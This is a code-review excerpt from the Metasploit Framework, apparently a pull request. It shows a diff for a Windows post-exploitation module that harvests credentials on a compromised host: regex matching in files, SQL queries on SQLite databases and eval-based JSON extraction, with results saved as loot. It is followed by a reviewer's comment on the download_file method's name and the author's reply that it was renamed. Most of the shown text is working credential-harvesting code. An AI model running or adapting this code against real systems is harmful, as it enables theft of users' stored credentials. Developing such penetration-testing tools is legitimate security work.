lib/msf/core/post/windows/packrat.rb

```diff
@@ -0,0 +1,242 @@
+              user_strip = user_match.gsub(/\s+/, '').to_s
+              vprint_status "Searching for #{regex_string}"
+              print_good user_strip.to_s
+              credential_array << user_strip
+            end
+          end
+
+          credential_array.each do |file_write|
+            file_save = file_write.chomp + "\n"
+            cred_save << file_save.to_s
+          end
+          regex_loot = store_loot("EXTRACTION#{artifact}", '', session, cred_save.to_s, local_loc)
+          print_good "File with data saved:  #{regex_loot}"
+        rescue StandardError => e
+          print_status e.to_s
+        end
+
+        def extract_sqlite(saving_path, artifact_child, artifact, local_loc)
+          database_string = ''
+          database_file = ::SQLite3::Database.open(saving_path.to_s)
+          artifact_child[:sql_search].each do |sql_child|
+            db = database_file.prepare "SELECT #{sql_child[:sql_column]} FROM #{sql_child[:sql_table]}"
+            db_command = db.execute
+            db_command.each do |database_row|
+              join_info = database_row.join "\s"
+              line_split = join_info.chomp + "\n"
+              database_string << line_split.to_s
+            end
+          end
+
+          sql_loot = store_loot("EXTRACTIONS#{artifact}", '', session, database_string.to_s, local_loc)
+          print_good "File with data saved:  #{sql_loot}"
+        rescue StandardError => e
+          print_status e.to_s
+        end
+
+        def extract_json(saving_path, artifact_child, artifact, local_loc)
+          json_file = ::File.read(saving_path.to_s)
+          json_parse = JSON.parse(json_file)
+          parent_json_query = ''
+          child_json_query = []
+          json_credential_save = []
+          json_cred = ''
+
+          artifact_child[:json_search].each do |json_split|
+            parent_json_query << json_split[:json_parent]
+            json_split[:json_children].each do |json_child|
+              child_json_query << json_child.to_s
+            end
+          end
+
+          child_json_query.each do |split|
+            children = eval("json_parse#{parent_json_query}")
+            children.each do |child_node|
+              child = eval("child_node#{split}").to_s
+              json_credential_save << "#{split}:  #{child}"
+            end
+          end
+
+          json_credential_save.each do |json_save|
+            file_save = json_save.chomp + "\n"
+            print_good file_save.to_s
+            json_cred << file_save.to_s
+          end
+          json_loot = store_loot("EXTRACTIONS#{artifact}", '', session, json_cred.to_s, local_loc)
+          print_good "File with data saved:  #{json_loot}"
+        rescue StandardError => e
+          print_status e.to_s
+        end
+
+        # Download file from the remote system, if it exists.
+        def download_file(saving_path, file_to_download, file, application)
```

Comment:
The way this is named could make it very possible to create conflicts in the future. We currently have a `#upload_file` method in `Msf::Post::File` that could easily get a download counter-part that would likely use the same signature of `download_file(remote, local)` which would break when the other arguments are passed.

I would either renaming this method to something more unique, or add `download_file` to `Msf::Post::File` using the `(remote, local)` signature and dropping the status messages. If you took this path, you'd be closer to retaining shell compatibility since shell session are capable of reading (and thus downloading) files as well, though you may run into issues when dealing with binary files like SQLite. Upon a cursory review, I don't see any reason this has to be specific to Meterpreter given that it's mostly dealing with file operations.

Reply:
Hi @smcintyre-r7 
Thank you for the suggestions. I have renamed the method to a more unique name. The changes were made at f5252172a6e11b895a1667908e64a8db5ddd7eb1.